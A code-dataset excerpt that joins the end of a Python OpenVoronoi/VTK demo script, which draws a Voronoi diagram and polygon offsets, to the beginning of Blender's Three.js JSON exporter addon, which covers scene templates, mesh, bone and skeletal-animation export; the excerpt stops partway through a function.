myscreen.addActor(ovdvtk.Line(p1=(pt1.x, pt1.y, 0), p2=(pt2.x, pt2.y, 0), color=lineColor))
def drawArc(myscreen, pt1, pt2, r, arcColor):
myscreen.addActor(ovdvtk.Line(p1=(pt1.x, pt1.y, 0), p2=(pt2.x, pt2.y, 0), color=arcColor))
def drawOffsets(myscreen, ofs):
# draw loops
nloop = 0
lineColor = ovdvtk.green
arcColor = ovdvtk.grass
for lop in ofs:
n = 0
N = len(lop)
first_point = []
previous = []
for p in lop:
# p[0] is the Point
# p[1] is -1 for lines, and r for arcs
if n == 0: # don't draw anything on the first iteration
previous = p[0]
# first_point = p[0]
else:
r = p[1]
p = p[0]
if r == -1:
drawLine(myscreen, previous, p, lineColor)
else:
drawArc(myscreen, previous, p, r, arcColor)
# myscreen.addActor( ovdvtk.Line(p1=(previous.x,previous.y,0),p2=(p.x,p.y,0),color=loopColor) )
previous = p
n = n + 1
print "rendered loop ", nloop, " with ", len(lop), " points"
nloop = nloop + 1
poly_points = [(0.15907424869091413, -0.22755592000227737),
(-0.158774429631718, -0.22755592000227737),
(-0.158774429631718, 0.5000000000000007),
(0.44085019690616595, -0.4999999999999993),
(0.44085019690616595, 0.4999999999999993)]
if __name__ == "__main__":
# w=2500
# h=1500
# w=1920
# h=1080
w = 1024
h = 1024
myscreen = ovdvtk.VTKScreen(width=w, height=h)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 3
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
vod.textScale = 0.02
vod.vertexRadius = 0.0031
vod.drawVertices = 0
vod.drawVertexIndex = 1
vod.drawGenerators = 1
vod.offsetEdges = 0
vd.setEdgeOffset(0.05)
"""
p1=ovd.Point(-0.1,-0.2)
p2=ovd.Point(0.2,0.1)
p3=ovd.Point(0.4,0.2)
p4=ovd.Point(0.6,0.6)
p5=ovd.Point(-0.6,0.3)
pts = [p1,p2,p3,p4,p5]
"""
pts = []
for p in poly_points:
pts.append(ovd.Point(p[0], p[1]))
# t_after = time.time()
# print ".done in {0:.3f} s.".format( t_after-t_before )
times = []
id_list = []
m = 0
t_before = time.time()
for p in pts:
pt_id = vd.addVertexSite(p)
id_list.append(pt_id)
print m, " added vertex", pt_id, " at ", p
m = m + 1
t_after = time.time()
times.append(t_after - t_before)
# exit()
# print " ",2*Nmax," point-sites sites took {0:.3f}".format(times[0])," seconds, {0:.2f}".format( 1e6*float( times[0] )/(float(2*Nmax)*float(math.log10(2*Nmax))) ) ,"us/n*log(n)"
print "all point sites inserted. "
print "VD check: ", vd.check()
print "now adding line-segments."
t_before = time.time()
for n in [0]: # range(len(id_list)):
if n == len(id_list) - 1:
print n, " trying ", n, " to ", n + 1
vd.addLineSite(id_list[n], id_list[n + 1])
print n, " added segment", n, " to ", n + 1
else:
print n, " trying ", n, " to ", n + 1
vd.addLineSite(id_list[n], id_list[0])
print n, " added final segment", n, " to ", 0
# vd.addLineSite( id_list[1], id_list[2])
# vd.addLineSite( id_list[2], id_list[3])
# vd.addLineSite( id_list[3], id_list[4])
# vd.addLineSite( id_list[4], id_list[0])
vd.check()
t_after = time.time()
line_time = t_after - t_before
if line_time < 1e-3:
line_time = 1
times.append(line_time)
# of = ovd.Offset( vd.getGraph() ) # pass the created graph to the Offset class
# of.str()
# ofs = of.offset(0.123)
# print ofs
# drawOffsets(myscreen, ofs)
pi = ovd.PolygonInterior(True)
vd.filter_graph(pi)
of = ovd.Offset(vd.getGraph()) # pass the created graph to the Offset class
ofs = of.offset(0.123)
# print ofs
ovdvtk.drawOffsets(myscreen, ofs)
# of.offset(0.125)
vod.setVDText2(times)
vod.setAll()
print "PYTHON All DONE."
myscreen.render()
myscreen.iren.Start()
| lgpl-2.1 | 3,184,200,570,010,201,600 | 27.321839 | 184 | 0.559253 | false |
altGrey/TrueOpenIso | SOURCE/CODE/cssh/public_html/js/three/mrdoob-three.js-d3cb4e7/utils/exporters/blender/2.65/scripts/addons/io_mesh_threejs/export_threejs.py | 9 | 85025 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
Blender exporter for Three.js (ASCII JSON format).
TODO
- binary format
"""
import bpy
import mathutils
import shutil
import os
import os.path
import math
import operator
import random
# #####################################################
# Configuration
# #####################################################
DEFAULTS = {
"bgcolor" : [0, 0, 0],
"bgalpha" : 1.0,
"position" : [0, 0, 0],
"rotation" : [0, 0, 0],
"scale" : [1, 1, 1],
"camera" :
{
"name" : "default_camera",
"type" : "PerspectiveCamera",
"near" : 1,
"far" : 10000,
"fov" : 60,
"aspect": 1.333,
"position" : [0, 0, 10],
"target" : [0, 0, 0]
},
"light" :
{
"name" : "default_light",
"type" : "DirectionalLight",
"direction" : [0, 1, 1],
"color" : [1, 1, 1],
"intensity" : 0.8
}
}
ROTATE_X_PI2 = mathutils.Quaternion((1.0, 0.0, 0.0), math.radians(-90.0)).to_matrix().to_4x4()
# default colors for debugging (each material gets one distinct color):
# white, red, green, blue, yellow, cyan, magenta
COLORS = [0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee, 0xeeee00, 0x00eeee, 0xee00ee]
# skinning
MAX_INFLUENCES = 2
# #####################################################
# Templates - scene
# #####################################################
TEMPLATE_SCENE_ASCII = """\
{
"metadata" :
{
"formatVersion" : 3.2,
"type" : "scene",
"sourceFile" : "%(fname)s",
"generatedBy" : "Blender 2.7 Exporter",
"objects" : %(nobjects)s,
"geometries" : %(ngeometries)s,
"materials" : %(nmaterials)s,
"textures" : %(ntextures)s
},
"urlBaseType" : %(basetype)s,
%(sections)s
"transform" :
{
"position" : %(position)s,
"rotation" : %(rotation)s,
"scale" : %(scale)s
},
"defaults" :
{
"bgcolor" : %(bgcolor)s,
"bgalpha" : %(bgalpha)f,
"camera" : %(defcamera)s
}
}
"""
TEMPLATE_SECTION = """
"%s" :
{
%s
},
"""
TEMPLATE_OBJECT = """\
%(object_id)s : {
"geometry" : %(geometry_id)s,
"groups" : [ %(group_id)s ],
"material" : %(material_id)s,
"position" : %(position)s,
"rotation" : %(rotation)s,
"quaternion": %(quaternion)s,
"scale" : %(scale)s,
"visible" : %(visible)s,
"castShadow" : %(castShadow)s,
"receiveShadow" : %(receiveShadow)s,
"doubleSided" : %(doubleSided)s
}"""
TEMPLATE_EMPTY = """\
%(object_id)s : {
"groups" : [ %(group_id)s ],
"position" : %(position)s,
"rotation" : %(rotation)s,
"quaternion": %(quaternion)s,
"scale" : %(scale)s
}"""
TEMPLATE_GEOMETRY_LINK = """\
%(geometry_id)s : {
"type" : "ascii",
"url" : %(model_file)s
}"""
TEMPLATE_GEOMETRY_EMBED = """\
%(geometry_id)s : {
"type" : "embedded",
"id" : %(embed_id)s
}"""
TEMPLATE_TEXTURE = """\
%(texture_id)s : {
"url": %(texture_file)s%(extras)s
}"""
TEMPLATE_MATERIAL_SCENE = """\
%(material_id)s : {
"type": %(type)s,
"parameters": { %(parameters)s }
}"""
TEMPLATE_CAMERA_PERSPECTIVE = """\
%(camera_id)s : {
"type" : "PerspectiveCamera",
"fov" : %(fov)f,
"aspect": %(aspect)f,
"near" : %(near)f,
"far" : %(far)f,
"position": %(position)s,
"target" : %(target)s
}"""
TEMPLATE_CAMERA_ORTHO = """\
%(camera_id)s : {
"type" : "OrthographicCamera",
"left" : %(left)f,
"right" : %(right)f,
"top" : %(top)f,
"bottom": %(bottom)f,
"near" : %(near)f,
"far" : %(far)f,
"position": %(position)s,
"target" : %(target)s
}"""
TEMPLATE_LIGHT_POINT = """\
%(light_id)s : {
"type" : "PointLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f
}"""
TEMPLATE_LIGHT_SUN = """\
%(light_id)s : {
"type" : "AmbientLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f
}"""
TEMPLATE_LIGHT_SPOT = """\
%(light_id)s : {
"type" : "SpotLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f,
"use_shadow" : %(use_shadow)d,
"angle" : %(angle).3f
}"""
TEMPLATE_LIGHT_HEMI = """\
%(light_id)s : {
"type" : "HemisphereLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f
}"""
TEMPLATE_LIGHT_AREA = """\
%(light_id)s : {
"type" : "AreaLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f,
"gamma" : %(gamma).3f,
"shape" : "%(shape)s",
"size" : %(size).3f,
"size_y" : %(size_y).3f
}"""
TEMPLATE_VEC4 = '[ %g, %g, %g, %g ]'
TEMPLATE_VEC3 = '[ %g, %g, %g ]'
TEMPLATE_VEC2 = '[ %g, %g ]'
TEMPLATE_STRING = '"%s"'
TEMPLATE_HEX = "0x%06x"
# #####################################################
# Templates - model
# #####################################################
TEMPLATE_FILE_ASCII = """\
{
"metadata" :
{
"formatVersion" : 3.1,
"generatedBy" : "Blender 2.7 Exporter",
"vertices" : %(nvertex)d,
"faces" : %(nface)d,
"normals" : %(nnormal)d,
"colors" : %(ncolor)d,
"uvs" : [%(nuvs)s],
"materials" : %(nmaterial)d,
"morphTargets" : %(nmorphTarget)d,
"bones" : %(nbone)d
},
%(model)s
}
"""
TEMPLATE_MODEL_ASCII = """\
"scale" : %(scale)f,
"materials" : [%(materials)s],
"vertices" : [%(vertices)s],
"morphTargets" : [%(morphTargets)s],
"normals" : [%(normals)s],
"colors" : [%(colors)s],
"uvs" : [%(uvs)s],
"faces" : [%(faces)s],
"bones" : [%(bones)s],
"skinIndices" : [%(indices)s],
"skinWeights" : [%(weights)s],
"animations" : [%(animations)s]
"""
TEMPLATE_VERTEX = "%g,%g,%g"
TEMPLATE_VERTEX_TRUNCATE = "%d,%d,%d"
TEMPLATE_N = "%g,%g,%g"
TEMPLATE_UV = "%g,%g"
TEMPLATE_C = "%d"
# #####################################################
# Utils
# #####################################################
def veckey3(x,y,z):
return round(x, 6), round(y, 6), round(z, 6)
def veckey3d(v):
return veckey3(v.x, v.y, v.z)
def veckey2d(v):
return round(v[0], 6), round(v[1], 6)
def get_faces(obj):
if hasattr(obj, "tessfaces"):
return obj.tessfaces
else:
return obj.faces
def get_normal_indices(v, normals, mesh):
n = []
mv = mesh.vertices
for i in v:
normal = mv[i].normal
key = veckey3d(normal)
n.append( normals[key] )
return n
def get_uv_indices(face_index, uvs, mesh, layer_index):
uv = []
uv_layer = mesh.tessface_uv_textures[layer_index].data
for i in uv_layer[face_index].uv:
uv.append( uvs[veckey2d(i)] )
return uv
def get_color_indices(face_index, colors, mesh):
c = []
color_layer = mesh.tessface_vertex_colors.active.data
face_colors = color_layer[face_index]
face_colors = face_colors.color1, face_colors.color2, face_colors.color3, face_colors.color4
for i in face_colors:
c.append( colors[hexcolor(i)] )
return c
def rgb2int(rgb):
color = (int(rgb[0]*255) << 16) + (int(rgb[1]*255) << 8) + int(rgb[2]*255);
return color
# #####################################################
# Utils - files
# #####################################################
def write_file(fname, content):
out = open(fname, "w", encoding="utf-8")
out.write(content)
out.close()
def ensure_folder_exist(foldername):
"""Create folder (with whole path) if it doesn't exist yet."""
if not os.access(foldername, os.R_OK|os.W_OK|os.X_OK):
os.makedirs(foldername)
def ensure_extension(filepath, extension):
if not filepath.lower().endswith(extension):
filepath += extension
return filepath
def generate_mesh_filename(meshname, filepath):
normpath = os.path.normpath(filepath)
path, ext = os.path.splitext(normpath)
return "%s.%s%s" % (path, meshname, ext)
# #####################################################
# Utils - alignment
# #####################################################
def bbox(vertices):
"""Compute bounding box of vertex array.
"""
if len(vertices)>0:
minx = maxx = vertices[0].co.x
miny = maxy = vertices[0].co.y
minz = maxz = vertices[0].co.z
for v in vertices[1:]:
if v.co.x < minx:
minx = v.co.x
elif v.co.x > maxx:
maxx = v.co.x
if v.co.y < miny:
miny = v.co.y
elif v.co.y > maxy:
maxy = v.co.y
if v.co.z < minz:
minz = v.co.z
elif v.co.z > maxz:
maxz = v.co.z
return { 'x':[minx,maxx], 'y':[miny,maxy], 'z':[minz,maxz] }
else:
return { 'x':[0,0], 'y':[0,0], 'z':[0,0] }
def translate(vertices, t):
"""Translate array of vertices by vector t.
"""
for i in range(len(vertices)):
vertices[i].co.x += t[0]
vertices[i].co.y += t[1]
vertices[i].co.z += t[2]
def center(vertices):
"""Center model (middle of bounding box).
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0] + (bb['y'][1] - bb['y'][0])/2.0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
return [-cx,-cy,-cz]
def top(vertices):
"""Align top of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][1]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
return [-cx,-cy,-cz]
def bottom(vertices):
"""Align bottom of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
return [-cx,-cy,-cz]
# #####################################################
# Elements rendering
# #####################################################
def hexcolor(c):
return ( int(c[0] * 255) << 16 ) + ( int(c[1] * 255) << 8 ) + int(c[2] * 255)
def generate_vertices(vertices, option_vertices_truncate, option_vertices):
if not option_vertices:
return ""
return ",".join(generate_vertex(v, option_vertices_truncate) for v in vertices)
def generate_vertex(v, option_vertices_truncate):
if not option_vertices_truncate:
return TEMPLATE_VERTEX % (v.co.x, v.co.y, v.co.z)
else:
return TEMPLATE_VERTEX_TRUNCATE % (v.co.x, v.co.y, v.co.z)
def generate_normal(n):
return TEMPLATE_N % (n[0], n[1], n[2])
def generate_vertex_color(c):
return TEMPLATE_C % c
def generate_uv(uv):
return TEMPLATE_UV % (uv[0], uv[1])
# #####################################################
# Model exporter - faces
# #####################################################
def setBit(value, position, on):
if on:
mask = 1 << position
return (value | mask)
else:
mask = ~(1 << position)
return (value & mask)
def generate_faces(normals, uv_layers, colors, meshes, option_normals, option_colors, option_uv_coords, option_materials, option_faces):
if not option_faces:
return "", 0
vertex_offset = 0
material_offset = 0
chunks = []
for mesh, object in meshes:
vertexUV = len(mesh.uv_textures) > 0
vertexColors = len(mesh.vertex_colors) > 0
mesh_colors = option_colors and vertexColors
mesh_uvs = option_uv_coords and vertexUV
if vertexUV:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
mesh_extract_uvs = False
if vertexColors:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
mesh_extract_colors = False
for i, f in enumerate(get_faces(mesh)):
face = generate_face(f, i, normals, uv_layers, colors, mesh, option_normals, mesh_colors, mesh_uvs, option_materials, vertex_offset, material_offset)
chunks.append(face)
vertex_offset += len(mesh.vertices)
material_count = len(mesh.materials)
if material_count == 0:
material_count = 1
material_offset += material_count
return ",".join(chunks), len(chunks)
def generate_face(f, faceIndex, normals, uv_layers, colors, mesh, option_normals, option_colors, option_uv_coords, option_materials, vertex_offset, material_offset):
isTriangle = ( len(f.vertices) == 3 )
if isTriangle:
nVertices = 3
else:
nVertices = 4
hasMaterial = option_materials
hasFaceUvs = False # not supported in Blender
hasFaceVertexUvs = option_uv_coords
hasFaceNormals = False # don't export any face normals (as they are computed in engine)
hasFaceVertexNormals = option_normals
hasFaceColors = False # not supported in Blender
hasFaceVertexColors = option_colors
faceType = 0
faceType = setBit(faceType, 0, not isTriangle)
faceType = setBit(faceType, 1, hasMaterial)
faceType = setBit(faceType, 2, hasFaceUvs)
faceType = setBit(faceType, 3, hasFaceVertexUvs)
faceType = setBit(faceType, 4, hasFaceNormals)
faceType = setBit(faceType, 5, hasFaceVertexNormals)
faceType = setBit(faceType, 6, hasFaceColors)
faceType = setBit(faceType, 7, hasFaceVertexColors)
faceData = []
# order is important, must match order in JSONLoader
# face type
# vertex indices
# material index
# face uvs index
# face vertex uvs indices
# face color index
# face vertex colors indices
faceData.append(faceType)
# must clamp in case on polygons bigger than quads
for i in range(nVertices):
index = f.vertices[i] + vertex_offset
faceData.append(index)
if hasMaterial:
index = f.material_index + material_offset
faceData.append( index )
if hasFaceVertexUvs:
for layer_index, uvs in enumerate(uv_layers):
uv = get_uv_indices(faceIndex, uvs, mesh, layer_index)
for i in range(nVertices):
index = uv[i]
faceData.append(index)
if hasFaceVertexNormals:
n = get_normal_indices(f.vertices, normals, mesh)
for i in range(nVertices):
index = n[i]
faceData.append(index)
if hasFaceVertexColors:
c = get_color_indices(faceIndex, colors, mesh)
for i in range(nVertices):
index = c[i]
faceData.append(index)
return ",".join( map(str, faceData) )
# #####################################################
# Model exporter - normals
# #####################################################
def extract_vertex_normals(mesh, normals, count):
for f in get_faces(mesh):
for v in f.vertices:
normal = mesh.vertices[v].normal
key = veckey3d(normal)
if key not in normals:
normals[key] = count
count += 1
return count
def generate_normals(normals, option_normals):
if not option_normals:
return ""
chunks = []
for key, index in sorted(normals.items(), key = operator.itemgetter(1)):
chunks.append(key)
return ",".join(generate_normal(n) for n in chunks)
# #####################################################
# Model exporter - vertex colors
# #####################################################
def extract_vertex_colors(mesh, colors, count):
color_layer = mesh.tessface_vertex_colors.active.data
for face_index, face in enumerate(get_faces(mesh)):
face_colors = color_layer[face_index]
face_colors = face_colors.color1, face_colors.color2, face_colors.color3, face_colors.color4
for c in face_colors:
key = hexcolor(c)
if key not in colors:
colors[key] = count
count += 1
return count
def generate_vertex_colors(colors, option_colors):
if not option_colors:
return ""
chunks = []
for key, index in sorted(colors.items(), key=operator.itemgetter(1)):
chunks.append(key)
return ",".join(generate_vertex_color(c) for c in chunks)
# #####################################################
# Model exporter - UVs
# #####################################################
def extract_uvs(mesh, uv_layers, counts):
for index, layer in enumerate(mesh.tessface_uv_textures):
if len(uv_layers) <= index:
uvs = {}
count = 0
uv_layers.append(uvs)
counts.append(count)
else:
uvs = uv_layers[index]
count = counts[index]
uv_layer = layer.data
for face_index, face in enumerate(get_faces(mesh)):
for uv_index, uv in enumerate(uv_layer[face_index].uv):
key = veckey2d(uv)
if key not in uvs:
uvs[key] = count
count += 1
counts[index] = count
return counts
def generate_uvs(uv_layers, option_uv_coords):
if not option_uv_coords:
return "[]"
layers = []
for uvs in uv_layers:
chunks = []
for key, index in sorted(uvs.items(), key=operator.itemgetter(1)):
chunks.append(key)
layer = ",".join(generate_uv(n) for n in chunks)
layers.append(layer)
return ",".join("[%s]" % n for n in layers)
# ##############################################################################
# Model exporter - armature
# (only the first armature will exported)
# ##############################################################################
def get_armature():
if len(bpy.data.armatures) == 0:
print("Warning: no armatures in the scene")
return None, None
armature = bpy.data.armatures[0]
# Someone please figure out a proper way to get the armature node
for object in bpy.data.objects:
if object.type == 'ARMATURE':
return armature, object
print("Warning: no node of type 'ARMATURE' in the scene")
return None, None
# ##############################################################################
# Model exporter - bones
# (only the first armature will exported)
# ##############################################################################
def generate_bones(meshes, option_bones, flipyz):
if not option_bones:
return "", 0
armature, armature_object = get_armature()
if armature_object is None:
return "", 0
hierarchy = []
armature_matrix = armature_object.matrix_world
pose_bones = armature_object.pose.bones
#pose_bones = armature.bones
TEMPLATE_BONE = '{"parent":%d,"name":"%s","pos":[%g,%g,%g],"rotq":[%g,%g,%g,%g],"scl":[%g,%g,%g]}'
for pose_bone in pose_bones:
armature_bone = pose_bone.bone
#armature_bone = pose_bone
bonePos = armature_matrix * armature_bone.head_local
boneIndex = None
if armature_bone.parent is None:
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_index = -1
else:
parent_matrix = armature_matrix * armature_bone.parent.matrix_local
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_matrix = parent_matrix.inverted() * bone_matrix
bone_index = i = 0
for pose_parent in pose_bones:
armature_parent = pose_parent.bone
#armature_parent = pose_parent
if armature_parent.name == armature_bone.parent.name:
bone_index = i
i += 1
pos, rot, scl = bone_matrix.decompose()
if flipyz:
joint = TEMPLATE_BONE % (bone_index, armature_bone.name, pos.x, pos.z, -pos.y, rot.x, rot.z, -rot.y, rot.w, scl.x, scl.z, scl.y)
hierarchy.append(joint)
else:
joint = TEMPLATE_BONE % (bone_index, armature_bone.name, pos.x, pos.y, pos.z, rot.x, rot.y, rot.z, rot.w, scl.x, scl.y, scl.z)
hierarchy.append(joint)
bones_string = ",".join(hierarchy)
return bones_string, len(pose_bones)
# ##############################################################################
# Model exporter - skin indices and weights
# ##############################################################################
def generate_indices_and_weights(meshes, option_skinning):
if not option_skinning or len(bpy.data.armatures) == 0:
return "", ""
indices = []
weights = []
armature, armature_object = get_armature()
for mesh, object in meshes:
i = 0
mesh_index = -1
# find the original object
for obj in bpy.data.objects:
if obj.name == mesh.name or obj == object:
mesh_index = i
i += 1
if mesh_index == -1:
print("generate_indices: couldn't find object for mesh", mesh.name)
continue
object = bpy.data.objects[mesh_index]
for vertex in mesh.vertices:
# sort bones by influence
bone_array = []
for group in vertex.groups:
index = group.group
weight = group.weight
bone_array.append( (index, weight) )
bone_array.sort(key = operator.itemgetter(1), reverse=True)
# select first N bones
for i in range(MAX_INFLUENCES):
if i < len(bone_array):
bone_proxy = bone_array[i]
found = 0
index = bone_proxy[0]
weight = bone_proxy[1]
for j, bone in enumerate(armature_object.pose.bones):
if object.vertex_groups[index].name == bone.name:
indices.append('%d' % j)
weights.append('%g' % weight)
found = 1
break
if found != 1:
indices.append('0')
weights.append('0')
else:
indices.append('0')
weights.append('0')
indices_string = ",".join(indices)
weights_string = ",".join(weights)
return indices_string, weights_string
# ##############################################################################
# Model exporter - skeletal animation
# (only the first action will exported)
# ##############################################################################
def generate_animation(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time, index):
if not option_animation_skeletal or len(bpy.data.actions) == 0:
return ""
# TODO: Add scaling influences
action = bpy.data.actions[index]
# get current context and then switch to dopesheet temporarily
current_context = bpy.context.area.type
bpy.context.area.type = "DOPESHEET_EDITOR"
bpy.context.space_data.mode = "ACTION"
# set active action
bpy.context.area.spaces.active.action = action
armature, armature_object = get_armature()
if armature_object is None or armature is None:
return "", 0
#armature_object = bpy.data.objects['marine_rig']
armature_matrix = armature_object.matrix_world
fps = bpy.data.scenes[0].render.fps
end_frame = action.frame_range[1]
start_frame = action.frame_range[0]
frame_length = end_frame - start_frame
used_frames = int(frame_length / option_frame_step) + 1
TEMPLATE_KEYFRAME_FULL = '{"time":%g,"pos":[%g,%g,%g],"rot":[%g,%g,%g,%g],"scl":[%g,%g,%g]}'
TEMPLATE_KEYFRAME_BEGIN = '{"time":%g'
TEMPLATE_KEYFRAME_END = '}'
TEMPLATE_KEYFRAME_POS = ',"pos":[%g,%g,%g]'
TEMPLATE_KEYFRAME_ROT = ',"rot":[%g,%g,%g,%g]'
TEMPLATE_KEYFRAME_SCL = ',"scl":[%g,%g,%g]'
keys = []
channels_location = []
channels_rotation = []
channels_scale = []
# Precompute per-bone data
for pose_bone in armature_object.pose.bones:
armature_bone = pose_bone.bone
keys.append([])
channels_location.append( find_channels(action, armature_bone, "location"))
channels_rotation.append( find_channels(action, armature_bone, "rotation_quaternion"))
channels_rotation.append( find_channels(action, armature_bone, "rotation_euler"))
channels_scale.append( find_channels(action, armature_bone, "scale"))
# Process all frames
for frame_i in range(0, used_frames):
#print("Processing frame %d/%d" % (frame_i, used_frames))
# Compute the index of the current frame (snap the last index to the end)
frame = start_frame + frame_i * option_frame_step
if frame_i == used_frames-1:
frame = end_frame
# Compute the time of the frame
if option_frame_index_as_time:
time = frame - start_frame
else:
time = (frame - start_frame) / fps
# Let blender compute the pose bone transformations
bpy.data.scenes[0].frame_set(frame)
# Process all bones for the current frame
bone_index = 0
for pose_bone in armature_object.pose.bones:
# Extract the bone transformations
if pose_bone.parent is None:
bone_matrix = armature_matrix * pose_bone.matrix
else:
parent_matrix = armature_matrix * pose_bone.parent.matrix
bone_matrix = armature_matrix * pose_bone.matrix
bone_matrix = parent_matrix.inverted() * bone_matrix
pos, rot, scl = bone_matrix.decompose()
pchange = True or has_keyframe_at(channels_location[bone_index], frame)
rchange = True or has_keyframe_at(channels_rotation[bone_index], frame)
schange = True or has_keyframe_at(channels_scale[bone_index], frame)
if flipyz:
px, py, pz = pos.x, pos.z, -pos.y
rx, ry, rz, rw = rot.x, rot.z, -rot.y, rot.w
sx, sy, sz = scl.x, scl.z, scl.y
else:
px, py, pz = pos.x, pos.y, pos.z
rx, ry, rz, rw = rot.x, rot.y, rot.z, rot.w
sx, sy, sz = scl.x, scl.y, scl.z
# START-FRAME: needs pos, rot and scl attributes (required frame)
if frame == start_frame:
keyframe = TEMPLATE_KEYFRAME_FULL % (time, px, py, pz, rx, ry, rz, rw, sx, sy, sz)
keys[bone_index].append(keyframe)
# END-FRAME: needs pos, rot and scl attributes with animation length (required frame)
elif frame == end_frame:
keyframe = TEMPLATE_KEYFRAME_FULL % (time, px, py, pz, rx, ry, rz, rw, sx, sy, sz)
keys[bone_index].append(keyframe)
# MIDDLE-FRAME: needs only one of the attributes, can be an empty frame (optional frame)
elif pchange == True or rchange == True:
keyframe = TEMPLATE_KEYFRAME_BEGIN % time
if pchange == True:
keyframe = keyframe + TEMPLATE_KEYFRAME_POS % (px, py, pz)
if rchange == True:
keyframe = keyframe + TEMPLATE_KEYFRAME_ROT % (rx, ry, rz, rw)
if schange == True:
keyframe = keyframe + TEMPLATE_KEYFRAME_SCL % (sx, sy, sz)
keyframe = keyframe + TEMPLATE_KEYFRAME_END
keys[bone_index].append(keyframe)
bone_index += 1
# Gather data
parents = []
bone_index = 0
for pose_bone in armature_object.pose.bones:
keys_string = ",".join(keys[bone_index])
parent_index = bone_index - 1 # WTF? Also, this property is not used by three.js
parent = '{"parent":%d,"keys":[%s]}' % (parent_index, keys_string)
bone_index += 1
parents.append(parent)
hierarchy_string = ",".join(parents)
if option_frame_index_as_time:
length = frame_length
else:
length = frame_length / fps
animation_string = '"name":"%s","fps":%d,"length":%g,"hierarchy":[%s]' % (action.name, fps, length, hierarchy_string)
bpy.data.scenes[0].frame_set(start_frame)
# reset context
bpy.context.area.type = current_context
return animation_string
def find_channels(action, bone, channel_type):
bone_name = bone.name
ngroups = len(action.groups)
result = []
# Variant 1: channels grouped by bone names
if ngroups > 0:
# Find the channel group for the given bone
group_index = -1
for i in range(ngroups):
if action.groups[i].name == bone_name:
group_index = i
# Get all desired channels in that group
if group_index > -1:
for channel in action.groups[group_index].channels:
if channel_type in channel.data_path:
result.append(channel)
# Variant 2: no channel groups, bone names included in channel names
else:
bone_label = '"%s"' % bone_name
for channel in action.fcurves:
data_path = channel.data_path
if bone_label in data_path and channel_type in data_path:
result.append(channel)
return result
def find_keyframe_at(channel, frame):
for keyframe in channel.keyframe_points:
if keyframe.co[0] == frame:
return keyframe
return None
def has_keyframe_at(channels, frame):
for channel in channels:
if not find_keyframe_at(channel, frame) is None:
return True
return False
def generate_all_animations(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time):
all_animations_string = ""
if option_animation_skeletal:
for index in range(0, len(bpy.data.actions)):
if index != 0 :
all_animations_string += ", \n"
all_animations_string += "{" + generate_animation(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time,index) + "}"
return all_animations_string
def handle_position_channel(channel, frame, position):
change = False
if channel.array_index in [0, 1, 2]:
for keyframe in channel.keyframe_points:
if keyframe.co[0] == frame:
change = True
value = channel.evaluate(frame)
if channel.array_index == 0:
position.x = value
if channel.array_index == 1:
position.y = value
if channel.array_index == 2:
position.z = value
return change
def position(bone, frame, action, armatureMatrix):
position = mathutils.Vector((0,0,0))
change = False
ngroups = len(action.groups)
if ngroups > 0:
index = 0
for i in range(ngroups):
if action.groups[i].name == bone.name:
index = i
for channel in action.groups[index].channels:
if "location" in channel.data_path:
hasChanged = handle_position_channel(channel, frame, position)
change = change or hasChanged
else:
bone_label = '"%s"' % bone.name
for channel in action.fcurves:
data_path = channel.data_path
if bone_label in data_path and "location" in data_path:
hasChanged = handle_position_channel(channel, frame, position)
change = change or hasChanged
position = position * bone.matrix_local.inverted()
if bone.parent == None:
position.x += bone.head.x
position.y += bone.head.y
position.z += bone.head.z
else:
parent = bone.parent
parentInvertedLocalMatrix = parent.matrix_local.inverted()
parentHeadTailDiff = parent.tail_local - parent.head_local
position.x += (bone.head * parentInvertedLocalMatrix).x + parentHeadTailDiff.x
